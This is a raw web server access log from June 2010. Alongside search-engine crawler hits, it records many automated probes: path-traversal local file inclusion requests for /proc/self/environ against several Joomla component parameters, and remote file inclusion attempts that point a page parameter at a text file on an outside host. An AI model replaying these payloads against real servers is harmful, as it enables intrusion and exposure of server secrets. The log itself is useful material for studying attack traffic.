208.115.111.248 - - [13/Jun/2010:08:00:04 -0500] "GET /logs/access_log.1220572800 HTTP/1.1" 404 310 "-""Mozilla/5.0 (compatible; DotBot/1.1; http://www.dotnetdotcom.org/, crawler@dotnetdotcom.org)"
208.115.111.248 - - [13/Jun/2010:08:00:06 -0500] "GET /logs/access_log.1220832000 HTTP/1.1" 404 310 "-""Mozilla/5.0 (compatible; DotBot/1.1; http://www.dotnetdotcom.org/, crawler@dotnetdotcom.org)"
208.115.111.248 - - [13/Jun/2010:08:00:09 -0500] "GET /logs/access_log.1221004800 HTTP/1.1" 404 310 "-""Mozilla/5.0 (compatible; DotBot/1.1; http://www.dotnetdotcom.org/, crawler@dotnetdotcom.org)"
67.195.112.180 - - [13/Jun/2010:08:00:29 -0500] "GET /logs/access_log.1262908800 HTTP/1.0" 404 298 "-""Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
207.46.195.240 - - [13/Jun/2010:08:03:59 -0500] "GET /robots.txt HTTP/1.1" 404 294 "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
207.46.195.240 - - [13/Jun/2010:08:04:37 -0500] "GET /logs/access_log.1247097600 HTTP/1.1" 404 310 "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
83.125.73.41 - - [13/Jun/2010:08:08:07 -0500] "GET /logs///index.php?language_home=&rootdp=zZz&gsLanguage=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 300 "-""libwww-perl/5.805"
83.125.73.41 - - [13/Jun/2010:08:08:07 -0500] "GET ///index.php?language_home=&rootdp=zZz&gsLanguage=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 295 "-""libwww-perl/5.805"
83.125.73.41 - - [13/Jun/2010:08:08:07 -0500] "GET /logs///index.php?language_home=&rootdp=zZz&gsLanguage=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 300 "-""libwww-perl/5.805"
83.125.73.41 - - [13/Jun/2010:08:08:07 -0500] "GET ///index.php?language_home=&rootdp=zZz&gsLanguage=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 295 "-""libwww-perl/5.805"
189.108.172.26 - - [13/Jun/2010:08:09:33 -0500] "GET /logs/lfi../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 354 "-""libwww-perl/5.808"
189.108.172.26 - - [13/Jun/2010:08:09:38 -0500] "GET /lfi../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 349 "-""libwww-perl/5.808"
189.108.172.26 - - [13/Jun/2010:08:09:59 -0500] "GET /logs/lfi../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 354 "-""libwww-perl/5.808"
189.108.172.26 - - [13/Jun/2010:08:10:01 -0500] "GET /lfi../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 349 "-""libwww-perl/5.808"
189.108.172.26 - - [13/Jun/2010:08:10:04 -0500] "GET /logs/lfi../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 354 "-""libwww-perl/5.808"
66.230.221.15 - - [13/Jun/2010:08:10:05 -0500] "GET //index.php?option=com_jvehicles&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""Mozilla/5.0"
66.230.221.15 - - [13/Jun/2010:08:10:05 -0500] "GET /logs//index.php?option=com_jvehicles&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""Mozilla/5.0"
189.108.172.26 - - [13/Jun/2010:08:10:06 -0500] "GET /lfi../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 349 "-""libwww-perl/5.808"
66.230.221.15 - - [13/Jun/2010:08:10:12 -0500] "GET /logs/access_log.1271462400//index.php?option=com_jvehicles&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 321 "-""Mozilla/5.0"
189.108.172.26 - - [13/Jun/2010:08:10:42 -0500] "GET /logs/lfi../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 354 "-""libwww-perl/5.808"
94.23.197.156 - - [13/Jun/2010:08:10:42 -0500] "GET /logs//index.php?option=com_realtyna&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.803"
94.23.197.156 - - [13/Jun/2010:08:10:43 -0500] "GET //index.php?option=com_realtyna&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.803"
189.108.172.26 - - [13/Jun/2010:08:10:44 -0500] "GET /lfi../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 349 "-""libwww-perl/5.808"
189.108.172.26 - - [13/Jun/2010:08:11:08 -0500] "GET /logs/lfi../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 354 "-""libwww-perl/5.808"
189.108.172.26 - - [13/Jun/2010:08:11:10 -0500] "GET /lfi../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 349 "-""libwww-perl/5.808"
189.108.172.26 - - [13/Jun/2010:08:11:17 -0500] "GET /logs/lfi../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 354 "-""libwww-perl/5.808"
189.108.172.26 - - [13/Jun/2010:08:11:19 -0500] "GET /lfi../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 349 "-""libwww-perl/5.808"
189.108.172.26 - - [13/Jun/2010:08:11:28 -0500] "GET /logs/lfi../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 354 "-""libwww-perl/5.808"
189.108.172.26 - - [13/Jun/2010:08:11:30 -0500] "GET /lfi../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 349 "-""libwww-perl/5.808"
189.108.172.26 - - [13/Jun/2010:08:12:07 -0500] "GET /logs/lfi../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 354 "-""libwww-perl/5.808"
189.108.172.26 - - [13/Jun/2010:08:12:09 -0500] "GET /lfi../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 349 "-""libwww-perl/5.808"
189.108.172.26 - - [13/Jun/2010:08:12:10 -0500] "GET /logs/lfi../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 354 "-""libwww-perl/5.808"
189.108.172.26 - - [13/Jun/2010:08:12:15 -0500] "GET /lfi../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 349 "-""libwww-perl/5.808"
207.46.199.184 - - [13/Jun/2010:08:12:17 -0500] "GET /robots.txt HTTP/1.1" 404 294 "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
67.195.112.180 - - [13/Jun/2010:08:12:21 -0500] "GET /artwork/index.htm HTTP/1.0" 200 11078 "-""Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
189.108.172.26 - - [13/Jun/2010:08:12:50 -0500] "GET /logs/lfi../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 354 "-""libwww-perl/5.808"
189.108.172.26 - - [13/Jun/2010:08:12:55 -0500] "GET /lfi../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 349 "-""libwww-perl/5.808"
189.108.172.26 - - [13/Jun/2010:08:12:56 -0500] "GET /lfi../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 349 "-""libwww-perl/5.808"
189.108.172.26 - - [13/Jun/2010:08:13:01 -0500] "GET /lfi../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 349 "-""libwww-perl/5.808"
189.108.172.26 - - [13/Jun/2010:08:13:16 -0500] "GET /logs/lfi../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 354 "-""libwww-perl/5.808"
189.108.172.26 - - [13/Jun/2010:08:13:18 -0500] "GET /lfi../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 349 "-""libwww-perl/5.808"
189.108.172.26 - - [13/Jun/2010:08:13:18 -0500] "GET /lfi../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 349 "-""libwww-perl/5.808"
189.108.172.26 - - [13/Jun/2010:08:13:18 -0500] "GET /logs/lfi../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 354 "-""libwww-perl/5.808"
189.108.172.26 - - [13/Jun/2010:08:13:23 -0500] "GET /lfi../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 349 "-""libwww-perl/5.808"
189.108.172.26 - - [13/Jun/2010:08:13:23 -0500] "GET /lfi../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 349 "-""libwww-perl/5.808"
189.108.172.26 - - [13/Jun/2010:08:13:23 -0500] "GET /lfi../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 349 "-""libwww-perl/5.808"
122.252.7.141 - - [13/Jun/2010:08:13:24 -0500] "GET /logs//index.php?option=com_realtyna&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.831"
122.252.7.141 - - [13/Jun/2010:08:13:25 -0500] "GET //index.php?option=com_realtyna&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.831"
94.23.6.211 - - [13/Jun/2010:08:13:29 -0500] "GET /logs//index.php?option=com_realtyna&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.803"
94.23.6.211 - - [13/Jun/2010:08:13:29 -0500] "GET //index.php?option=com_realtyna&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.803"
189.108.172.26 - - [13/Jun/2010:08:13:40 -0500] "GET /lfi../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 349 "-""libwww-perl/5.808"
189.108.172.26 - - [13/Jun/2010:08:13:46 -0500] "GET /lfi../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 349 "-""libwww-perl/5.808"
189.108.172.26 - - [13/Jun/2010:08:13:55 -0500] "GET /lfi../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 349 "-""libwww-perl/5.808"
94.23.6.211 - - [13/Jun/2010:08:14:02 -0500] "GET /logs//index.php?option=com_realtyna&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.803"
94.23.6.211 - - [13/Jun/2010:08:14:03 -0500] "GET //index.php?option=com_realtyna&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.803"
189.108.172.26 - - [13/Jun/2010:08:14:20 -0500] "GET /lfi../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 349 "-""libwww-perl/5.808"
94.23.6.211 - - [13/Jun/2010:08:14:24 -0500] "GET /logs//index.php?option=com_realtyna&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.803"
94.23.6.211 - - [13/Jun/2010:08:14:33 -0500] "GET //index.php?option=com_realtyna&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.803"
94.23.6.211 - - [13/Jun/2010:08:14:43 -0500] "GET /logs//index.php?option=com_realtyna&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.803"
94.23.6.211 - - [13/Jun/2010:08:14:44 -0500] "GET //index.php?option=com_realtyna&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.803"
94.23.6.211 - - [13/Jun/2010:08:14:56 -0500] "GET /logs//index.php?option=com_realtyna&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.803"
94.23.6.211 - - [13/Jun/2010:08:14:56 -0500] "GET //index.php?option=com_realtyna&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.803"
94.23.6.211 - - [13/Jun/2010:08:15:15 -0500] "GET /logs//index.php?option=com_alphauserpoints&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.803"
94.23.6.211 - - [13/Jun/2010:08:15:25 -0500] "GET //index.php?option=com_alphauserpoints&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.803"
189.108.172.26 - - [13/Jun/2010:08:15:27 -0500] "GET /lfi../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 349 "-""libwww-perl/5.808"
94.23.6.211 - - [13/Jun/2010:08:15:32 -0500] "GET /logs//index.php?option=com_realtyna&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.803"
94.23.6.211 - - [13/Jun/2010:08:15:32 -0500] "GET /logs//index.php?option=com_alphauserpoints&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.803"
83.125.73.41 - - [13/Jun/2010:08:15:38 -0500] "GET ///index.php?language_home=&rootdp=zZz&gsLanguage=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 295 "-""libwww-perl/5.805"
83.125.73.41 - - [13/Jun/2010:08:15:39 -0500] "GET ///index.php?language_home=&rootdp=zZz&gsLanguage=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 295 "-""libwww-perl/5.805"
95.131.67.183 - - [13/Jun/2010:08:15:43 -0500] "GET ///index.php?language_home=&rootdp=zZz&gsLanguage=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 295 "-""libwww-perl/5.810"
189.108.172.26 - - [13/Jun/2010:08:15:54 -0500] "GET /lfi../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 349 "-""libwww-perl/5.808"
189.108.172.26 - - [13/Jun/2010:08:15:58 -0500] "GET /lfi../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 349 "-""libwww-perl/5.808"
94.23.6.211 - - [13/Jun/2010:08:16:15 -0500] "GET /logs//index.php?option=com_alphauserpoints&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.803"
94.23.6.211 - - [13/Jun/2010:08:16:15 -0500] "GET //index.php?option=com_alphauserpoints&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.803"
189.108.172.26 - - [13/Jun/2010:08:16:18 -0500] "GET /logs/lfi../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 354 "-""libwww-perl/5.808"
189.108.172.26 - - [13/Jun/2010:08:16:20 -0500] "GET /lfi../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 349 "-""libwww-perl/5.808"
189.108.172.26 - - [13/Jun/2010:08:16:37 -0500] "GET /lfi../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 349 "-""libwww-perl/5.808"
94.23.197.156 - - [13/Jun/2010:08:16:54 -0500] "GET /logs//index.php?option=com_alphauserpoints&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.803"
94.23.197.156 - - [13/Jun/2010:08:16:54 -0500] "GET //index.php?option=com_alphauserpoints&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.803"
94.23.197.156 - - [13/Jun/2010:08:17:04 -0500] "GET /logs//index.php?option=com_alphauserpoints&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.803"
94.23.197.156 - - [13/Jun/2010:08:17:04 -0500] "GET //index.php?option=com_alphauserpoints&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.803"
188.72.70.56 - - [13/Jun/2010:08:17:42 -0500] "GET //index.php?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.834"
94.23.197.156 - - [13/Jun/2010:08:18:34 -0500] "GET /logs//index.php?option=com_alphauserpoints&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.803"
94.23.197.156 - - [13/Jun/2010:08:18:34 -0500] "GET //index.php?option=com_alphauserpoints&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.803"
188.72.70.56 - - [13/Jun/2010:08:18:36 -0500] "GET //index.php?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.834"
94.23.197.156 - - [13/Jun/2010:08:19:04 -0500] "GET /logs//index.php?option=com_alphauserpoints&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.803"
94.23.197.156 - - [13/Jun/2010:08:19:04 -0500] "GET //index.php?option=com_alphauserpoints&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.803"
189.108.172.26 - - [13/Jun/2010:08:19:49 -0500] "GET /lfi../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 349 "-""libwww-perl/5.808"
67.195.112.180 - - [13/Jun/2010:08:22:55 -0500] "GET /robots.txt HTTP/1.0" 404 282 "-""Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)"
67.195.112.180 - - [13/Jun/2010:08:22:55 -0500] "GET /logs/access_log.1240099200 HTTP/1.0" 404 298 "-""Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
91.121.26.184 - - [13/Jun/2010:08:23:20 -0500] "GET //atom.php5?page=http://www.pyungsan.or.kr/bbs/id1.txt?? HTTP/1.1" 404 294 "-""Mozilla/5.0"
91.121.26.184 - - [13/Jun/2010:08:23:20 -0500] "GET /logs//atom.php5?page=http://www.pyungsan.or.kr/bbs/id1.txt?? HTTP/1.1" 404 299 "-""Mozilla/5.0"
91.121.26.184 - - [13/Jun/2010:08:23:20 -0500] "GET /logs/access_log.1271203200//atom.php5?page=http://www.pyungsan.or.kr/bbs/id1.txt?? HTTP/1.1" 404 321 "-""Mozilla/5.0"
91.121.26.184 - - [13/Jun/2010:08:23:24 -0500] "GET //atom.php5?page=http://www.pyungsan.or.kr/bbs/id1.txt?? HTTP/1.1" 404 294 "-""Mozilla/5.0"
91.121.26.184 - - [13/Jun/2010:08:23:24 -0500] "GET /logs//atom.php5?page=http://www.pyungsan.or.kr/bbs/id1.txt?? HTTP/1.1" 404 299 "-""Mozilla/5.0"
91.121.26.184 - - [13/Jun/2010:08:23:24 -0500] "GET /logs/access_log.1271203200//atom.php5?page=http://www.pyungsan.or.kr/bbs/id1.txt?? HTTP/1.1" 404 321 "-""Mozilla/5.0"
91.121.26.184 - - [13/Jun/2010:08:24:03 -0500] "GET /logs/access_log.1271376000//atom.php5?page=http://www.pyungsan.or.kr/bbs/id1.txt?? HTTP/1.1" 404 321 "-""Mozilla/5.0"
94.23.197.156 - - [13/Jun/2010:08:24:16 -0500] "GET /logs//index.php?option=com_travelbook&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.803"
94.23.197.156 - - [13/Jun/2010:08:24:16 -0500] "GET //index.php?option=com_travelbook&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.803"
94.23.197.156 - - [13/Jun/2010:08:24:19 -0500] "GET /logs//index.php?option=com_travelbook&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.803"
94.23.197.156 - - [13/Jun/2010:08:24:19 -0500] "GET //index.php?option=com_travelbook&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.803"
94.23.6.211 - - [13/Jun/2010:08:24:26 -0500] "GET /logs//index.php?option=com_travelbook&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.803"
94.23.6.211 - - [13/Jun/2010:08:24:26 -0500] "GET //index.php?option=com_travelbook&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.803"
207.46.204.242 - - [13/Jun/2010:08:24:35 -0500] "GET /logs/access_log.1227571200 HTTP/1.1" 404 310 "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
207.46.13.93 - - [13/Jun/2010:08:24:36 -0500] "GET /logs/access_log.1265846400 HTTP/1.1" 404 310 "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
94.23.197.156 - - [13/Jun/2010:08:24:46 -0500] "GET /logs//index.php?option=com_travelbook&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.803"
94.23.197.156 - - [13/Jun/2010:08:24:46 -0500] "GET //index.php?option=com_travelbook&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.803"
94.23.6.211 - - [13/Jun/2010:08:24:54 -0500] "GET /logs//index.php?option=com_travelbook&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.803"
94.23.6.211 - - [13/Jun/2010:08:24:54 -0500] "GET //index.php?option=com_travelbook&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.803"
122.252.7.141 - - [13/Jun/2010:08:25:17 -0500] "GET /logs//index.php?option=com_travelbook&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.831"
122.252.7.141 - - [13/Jun/2010:08:25:18 -0500] "GET //index.php?option=com_travelbook&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.831"
94.23.6.211 - - [13/Jun/2010:08:25:18 -0500] "GET /logs//index.php?option=com_travelbook&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.803"
94.23.6.211 - - [13/Jun/2010:08:25:19 -0500] "GET //index.php?option=com_travelbook&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.803"
94.23.6.211 - - [13/Jun/2010:08:25:22 -0500] "GET /logs//index.php?option=com_travelbook&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.803"
94.23.6.211 - - [13/Jun/2010:08:25:22 -0500] "GET //index.php?option=com_travelbook&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.803"
94.23.6.211 - - [13/Jun/2010:08:25:24 -0500] "GET /logs//index.php?option=com_travelbook&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.803"
94.23.6.211 - - [13/Jun/2010:08:25:24 -0500] "GET //index.php?option=com_travelbook&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.803"
122.252.7.141 - - [13/Jun/2010:08:25:30 -0500] "GET /logs//index.php?option=com_travelbook&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.831"
122.252.7.141 - - [13/Jun/2010:08:25:31 -0500] "GET //index.php?option=com_travelbook&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.831"
